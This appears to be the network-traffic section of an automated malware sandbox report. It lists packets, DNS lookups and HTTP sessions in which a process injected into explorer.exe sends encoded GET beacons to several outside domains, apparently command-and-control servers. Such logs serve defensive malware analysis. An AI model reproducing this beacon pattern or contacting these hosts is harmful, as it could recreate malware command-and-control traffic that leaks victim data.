                                                    Nov 20, 2020 20:06:08.050355911 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.050379992 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.050403118 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.050427914 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.050427914 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:08.050443888 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.050481081 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:08.050542116 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:08.050726891 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:28.278536081 CET4974180192.168.2.3162.0.232.118
                                                    Nov 20, 2020 20:06:28.446856022 CET8049741162.0.232.118192.168.2.3
                                                    Nov 20, 2020 20:06:28.447012901 CET4974180192.168.2.3162.0.232.118
                                                    Nov 20, 2020 20:06:28.447581053 CET4974180192.168.2.3162.0.232.118
                                                    Nov 20, 2020 20:06:28.654195070 CET8049741162.0.232.118192.168.2.3
                                                    Nov 20, 2020 20:06:28.654263020 CET8049741162.0.232.118192.168.2.3
                                                    Nov 20, 2020 20:06:28.654303074 CET8049741162.0.232.118192.168.2.3
                                                    Nov 20, 2020 20:06:28.654356003 CET8049741162.0.232.118192.168.2.3
                                                    Nov 20, 2020 20:06:28.654402971 CET8049741162.0.232.118192.168.2.3
                                                    Nov 20, 2020 20:06:28.654443979 CET8049741162.0.232.118192.168.2.3
                                                    Nov 20, 2020 20:06:28.654486895 CET4974180192.168.2.3162.0.232.118
                                                    Nov 20, 2020 20:06:28.654597044 CET4974180192.168.2.3162.0.232.118
                                                    Nov 20, 2020 20:06:28.654776096 CET8049741162.0.232.118192.168.2.3
                                                    Nov 20, 2020 20:06:28.654820919 CET8049741162.0.232.118192.168.2.3
                                                    Nov 20, 2020 20:06:28.655066967 CET4974180192.168.2.3162.0.232.118
                                                    Nov 20, 2020 20:06:28.655224085 CET4974180192.168.2.3162.0.232.118
                                                    Nov 20, 2020 20:06:28.823348045 CET8049741162.0.232.118192.168.2.3

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 20, 2020 20:04:27.174336910 CET4919953192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:27.201273918 CET53491998.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:28.409771919 CET5062053192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:28.445518970 CET53506208.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:29.263453007 CET6493853192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:29.299217939 CET53649388.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:30.287308931 CET6015253192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:30.323168039 CET53601528.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:31.344918013 CET5754453192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:31.371900082 CET53575448.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:32.375833035 CET5598453192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:32.411385059 CET53559848.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:33.312665939 CET6418553192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:33.339875937 CET53641858.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:34.131174088 CET6511053192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:34.166830063 CET53651108.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:37.789849997 CET5836153192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:37.816962004 CET53583618.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:42.357013941 CET6349253192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:42.384237051 CET53634928.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:42.432178974 CET6083153192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:42.467820883 CET53608318.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:45.847429037 CET6010053192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:45.874659061 CET53601008.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:46.653862953 CET5319553192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:46.689718008 CET53531958.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:47.502192020 CET5014153192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:47.529350042 CET53501418.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:48.451488972 CET5302353192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:48.478710890 CET53530238.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:49.907897949 CET4956353192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:49.935122967 CET53495638.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:50.950056076 CET5135253192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:50.985755920 CET53513528.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:51.852180004 CET5934953192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:51.879240990 CET53593498.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:52.744124889 CET5708453192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:52.771322966 CET53570848.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:54.259608984 CET5882353192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:54.286655903 CET53588238.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:55.150151014 CET5756853192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:55.177166939 CET53575688.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:04:56.516977072 CET5054053192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:04:56.544198036 CET53505408.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:05:13.104862928 CET5436653192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:05:13.131953001 CET53543668.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:05:13.430130005 CET5303453192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:05:13.457263947 CET53530348.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:05:26.419954062 CET5776253192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:05:26.563220978 CET53577628.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:05:30.900866032 CET5543553192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:05:30.927938938 CET53554358.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:05:36.146415949 CET5071353192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:05:36.184793949 CET53507138.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:05:47.008040905 CET5613253192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:05:47.198796034 CET53561328.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:06:06.429137945 CET5898753192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:06:06.456185102 CET53589878.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:06:07.502074003 CET5657953192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:06:07.637175083 CET53565798.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:06:07.774087906 CET6063353192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:06:07.801172018 CET53606338.8.8.8192.168.2.3
                                                    Nov 20, 2020 20:06:28.238503933 CET6129253192.168.2.38.8.8.8
                                                    Nov 20, 2020 20:06:28.276519060 CET53612928.8.8.8192.168.2.3

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    Nov 20, 2020 20:05:26.419954062 CET192.168.2.38.8.8.80x1b37Standard query (0)www.tessuto.netA (IP address)IN (0x0001)
                                                    Nov 20, 2020 20:05:47.008040905 CET192.168.2.38.8.8.80x6e50Standard query (0)www.reem.proA (IP address)IN (0x0001)
                                                    Nov 20, 2020 20:06:07.502074003 CET192.168.2.38.8.8.80x8650Standard query (0)www.themaskedstitcher.comA (IP address)IN (0x0001)
                                                    Nov 20, 2020 20:06:28.238503933 CET192.168.2.38.8.8.80xd8eStandard query (0)www.auctionpros.clubA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    Nov 20, 2020 20:05:26.563220978 CET8.8.8.8192.168.2.30x1b37No error (0)www.tessuto.netprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                    Nov 20, 2020 20:05:26.563220978 CET8.8.8.8192.168.2.30x1b37No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.138.72.189A (IP address)IN (0x0001)
                                                    Nov 20, 2020 20:05:26.563220978 CET8.8.8.8192.168.2.30x1b37No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.12.202.18A (IP address)IN (0x0001)
                                                    Nov 20, 2020 20:05:26.563220978 CET8.8.8.8192.168.2.30x1b37No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.134.22.63A (IP address)IN (0x0001)
                                                    Nov 20, 2020 20:05:47.198796034 CET8.8.8.8192.168.2.30x6e50No error (0)www.reem.proreem.proCNAME (Canonical name)IN (0x0001)
                                                    Nov 20, 2020 20:05:47.198796034 CET8.8.8.8192.168.2.30x6e50No error (0)reem.pro34.102.136.180A (IP address)IN (0x0001)
                                                    Nov 20, 2020 20:06:07.637175083 CET8.8.8.8192.168.2.30x8650No error (0)www.themaskedstitcher.comext-cust.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                    Nov 20, 2020 20:06:07.637175083 CET8.8.8.8192.168.2.30x8650No error (0)ext-cust.squarespace.com198.49.23.141A (IP address)IN (0x0001)
                                                    Nov 20, 2020 20:06:07.637175083 CET8.8.8.8192.168.2.30x8650No error (0)ext-cust.squarespace.com198.185.159.141A (IP address)IN (0x0001)
                                                    Nov 20, 2020 20:06:07.637175083 CET8.8.8.8192.168.2.30x8650No error (0)ext-cust.squarespace.com198.49.23.141A (IP address)IN (0x0001)
                                                    Nov 20, 2020 20:06:07.637175083 CET8.8.8.8192.168.2.30x8650No error (0)ext-cust.squarespace.com198.185.159.141A (IP address)IN (0x0001)
                                                    Nov 20, 2020 20:06:28.276519060 CET8.8.8.8192.168.2.30xd8eNo error (0)www.auctionpros.clubauctionpros.clubCNAME (Canonical name)IN (0x0001)
                                                    Nov 20, 2020 20:06:28.276519060 CET8.8.8.8192.168.2.30xd8eNo error (0)auctionpros.club162.0.232.118A (IP address)IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • www.tessuto.net
                                                    • www.reem.pro
                                                    • www.themaskedstitcher.com
                                                    • www.auctionpros.club

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.3497283.138.72.18980C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Nov 20, 2020 20:05:26.687122107 CET657OUTGET /glt/?SP=cnxhAdAh&V4=RXCBf+kTtqMKofvvq54zDDgrcqehmcxCBUCamp/3E7fzZOB7U/XBgSeZZ5TRQ//94zw4 HTTP/1.1
                                                    Host: www.tessuto.net
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Nov 20, 2020 20:05:26.800371885 CET658INHTTP/1.1 404 Not Found
                                                    Date: Fri, 20 Nov 2020 19:05:26 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 153
                                                    Connection: close
                                                    Server: nginx/1.16.1
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    1192.168.2.34973734.102.136.18080C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Nov 20, 2020 20:05:47.218628883 CET5031OUTGET /glt/?V4=MLpAZ0AK/spUlt1gTLvrDwTqfxMoBLVQzrzuTOkSqlsdFHJLAwBY2ZzU1xSBGMRzyeG8&SP=cnxhAdAh HTTP/1.1
                                                    Host: www.reem.pro
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Nov 20, 2020 20:05:47.333897114 CET5032INHTTP/1.1 403 Forbidden
                                                    Server: openresty
                                                    Date: Fri, 20 Nov 2020 19:05:47 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 275
                                                    ETag: "5fb7c9ca-113"
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    2192.168.2.349739198.49.23.14180C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Nov 20, 2020 20:06:07.740803957 CET5046OUTGET /glt/?SP=cnxhAdAh&V4=oeIisVoovR5GVMPXvvkWG2hSa0zFuUbByopAkVC9hBB+Ndji49czoVDBLaeM7MDZ9TnP HTTP/1.1
                                                    Host: www.themaskedstitcher.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Nov 20, 2020 20:06:07.845019102 CET5048INHTTP/1.1 400 Bad Request
                                                    content-length: 77564
                                                    expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                    pragma: no-cache
                                                    cache-control: no-cache, must-revalidate
                                                    content-type: text/html; charset=UTF-8
                                                    connection: close
                                                    date: Fri, 20 Nov 2020 19:06:07 UTC
                                                    x-contextid: P1FGM9Sl/6DPVlN07
                                                    server: Squarespace
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                    Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;
                                                    Nov 20, 2020 20:06:07.845062017 CET5049INData Raw: 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20
                                                    Data Ascii: font-weight: 300; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family
                                                    Nov 20, 2020 20:06:07.845097065 CET5050INData Raw: 5a 63 36 54 67 4b 77 31 43 5a 4c 45 58 79 47 5a 76 49 55 6a 4a 54 46 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34
                                                    Data Ascii: Zc6TgKw1CZLEXyGZvIUjJTFLWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMt
                                                    Nov 20, 2020 20:06:07.845140934 CET5052INData Raw: 41 62 54 6a 45 6d 75 66 55 51 6f 51 67 41 37 52 69 72 39 61 39 68 5a 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75
                                                    Data Ascii: AbTjEmufUQoQgA7Rir9a9hZxqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+
                                                    Nov 20, 2020 20:06:07.845180035 CET5053INData Raw: 54 2b 76 50 36 71 7a 4a 4c 38 6a 49 6d 56 38 74 4c 35 42 70 70 6c 34 4b 4d 79 4c 52 30 53 6c 45 57 53 55 6b 79 45 70 57 55 32 53 59 72 7a 53 46 56 62 6d 5a 55 6e 39 6d 67 4a 73 6e 73 2f 39 59 4a 4a 53 66 31 36 42 78 45 71 67 65 4a 47 69 52 61 6b
                                                    Data Ascii: T+vP6qzJL8jImV8tL5Bppl4KMyLR0SlEWSUkyEpWU2SYrzSFVbmZUn9mgJsns/9YJJSf16BxEqgeJGiRakKhDohWJejVmCgoZuPbCdbWci9RCpCaQWopUC1I5Vo+KwuY9EkFjK+Pn7Pgp943g2wHJmCJexrmFW8wMM3hgTsiI2WOlDmDVN8dYv07qeXcakOmkHUd/Je1qJH5IHealUa6ivUYq8aNJpvH6mDmiyswfsF1SOfqTZC
                                                    Nov 20, 2020 20:06:07.845216036 CET5054INData Raw: 30 6f 33 36 79 6e 57 48 74 55 67 6d 41 6c 73 76 78 65 41 43 50 46 30 67 33 38 72 32 67 44 2f 53 44 51 54 41 66 4c 41 53 4c 51 41 49 73 42 6b 76 42 63 70 43 55 69 34 69 77 67 51 67 76 4a 4d 4b 7a 59 63 30 52 34 51 56 45 4f 45 79 45 72 35 55 7a 32
                                                    Data Ascii: 0o36ynWHtUgmAlsvxeACPF0g38r2gD/SDQTAfLASLQAIsBkvBcpCUi4iwgQgvJMKzYc0R4QVEOEyEr5Uz2NkJcJ60SQ5M0j8fvExWEnWDSoARGVajUkO0jUTbRbSNRNslyp4ghV7I9xB+1OJ3TKKwBkDLQkZUCrBZZpwmggxeZ5kbkhZ8SGFrEKaL4Q/hr4c/hL9eqmHqkQBoRjFZDlObY4rDFIPJg6kSJg8mvJYY3nqwwCAhul
                                                    Nov 20, 2020 20:06:07.845251083 CET5056INData Raw: 54 54 5a 74 48 65 6a 7a 36 4f 49 4a 6c 47 67 56 4a 6e 33 33 36 6b 2b 6c 6a 64 57 73 4f 4f 75 76 44 50 7a 5a 70 45 4c 4c 45 4a 76 65 6f 73 4d 77 39 4c 74 42 54 47 4c 48 43 74 52 46 47 30 4b 49 39 73 4c 45 61 4c 4a 4e 6a 6d 53 4c 4c 64 4b 62 4f 4f
                                                    Data Ascii: TTZtHejz6OIJlGgVJn336k+ljdWsOOuvDPzZpELLEJveosMw9LtBTGLHCtRFG0KI9sLEaLJNjmSLLdKbOOBjxD5sWdZ2frGDS4ymqvMUCL/AUczyLicVtGpIF+E9M3uBN/kqNUzzNUxziKc7xb/7Dv2lRosCzuBSxOcg1Duh54VMwuksOk0LWTCioLMZSVi4YHYLt8EWLX+a5jSV45U3Bq1lRsK1mUlG5kMUpCKw15oaxSvZzUt
                                                    Nov 20, 2020 20:06:07.845287085 CET5057INData Raw: 31 69 75 4f 48 4a 65 4e 34 38 66 32 2b 4b 4c 4f 6b 53 51 47 46 69 74 78 6d 58 61 36 58 30 6a 6c 58 6e 4f 63 77 50 6a 6d 78 73 37 35 4f 6c 77 4c 58 52 56 65 34 71 63 37 6b 4a 34 67 53 4c 69 6b 4c 68 2f 65 49 57 63 44 69 6f 4d 69 33 5a 54 57 61 47
                                                    Data Ascii: 1iuOHJeN48f2+KLOkSQGFitxmXa6X0jlXnOcwPjmxs75OlwLXRVe4qc7kJ4gSLikLh/eIWcDioMi3ZTWaGocqAaE+t4m21f+m62DcVdpbcY8ek4hAUZGijXjL9b3EwlrdruaGO1s8EJfERgjVnrTxM1cgzZnjim/5FBpXxzmIQxlHbJ+UVUWFHH16H8gnvLSPmCizWviQum7sRlOQuVlY7+uLrI/PSucu+5TnKT9aSerjVgdlZQ
                                                    Nov 20, 2020 20:06:07.845320940 CET5058INData Raw: 56 72 56 37 31 61 31 44 44 47 74 55 43 4c 64 49 53 4c 64 4e 79 72 64 52 71 72 64 56 36 62 64 52 6d 62 64 55 4a 2b 6d 33 39 6a 67 37 71 73 45 37 55 55 62 31 48 50 30 51 4d 6b 61 64 49 69 54 49 74 74 4e 4b 67 6a 58 59 6d 4d 5a 6b 70 54 47 55 61 63
                                                    Data Ascii: VrV71a1DDGtUCLdISLdNyrdRqrdV6bdRmbdUJ+m39jg7qsE7UUb1HP0QMkadIiTIttNKgjXYmMZkpTGUac1jFatbxSxzjT/lb/Y3O0Jk6XxfqEr1Gr9fVul436RY9oIeTXJJPSklzUk8aSXvSkfQkg8kQIkeeuRzkJL0rKSa9yShiAWkyFMZ2rlClRgvTmTG24xrv+Cv8Ooc5kb/0vn+lv/bef6uTdYpO1Wk6XWfrXJ0Xexa8a9
                                                    Nov 20, 2020 20:06:07.845355988 CET5060INData Raw: 6c 4a 4b 61 63 6a 6e 77 32 38 51 65 6d 79 68 2b 61 43 6e 39 75 79 6b 53 79 59 76 6f 72 59 76 72 70 6d 48 34 68 70 74 38 58 30 31 64 4d 76 78 44 54 37 34 76 70 4b 36 61 76 6d 48 36 69 53 4a 6b 75 30 41 58 55 64 4b 45 75 70 45 55 58 36 53 4c 71 75
                                                    Data Ascii: lJKacjnw28Qemyh+aCn9uykSyYvorYvrpmH4hpt8X01dMvxDT74vpK6avmH6iSJku0AXUdKEupEUX6SLqulgX06pLdAkNXapLadNluox2vUKvYI1eqVeyS6/Sq1irV+vVrNNr9BrW67V6LRv0Or2OjXq9Xs8mvUFvYLPeqDeyJe5Xk67W1YzqGl1DSdfqWkZ0na5jWNfrembpBt3ATN2oGxnSTbqJZt2sm5mhW3QLc3SP7mGr7t
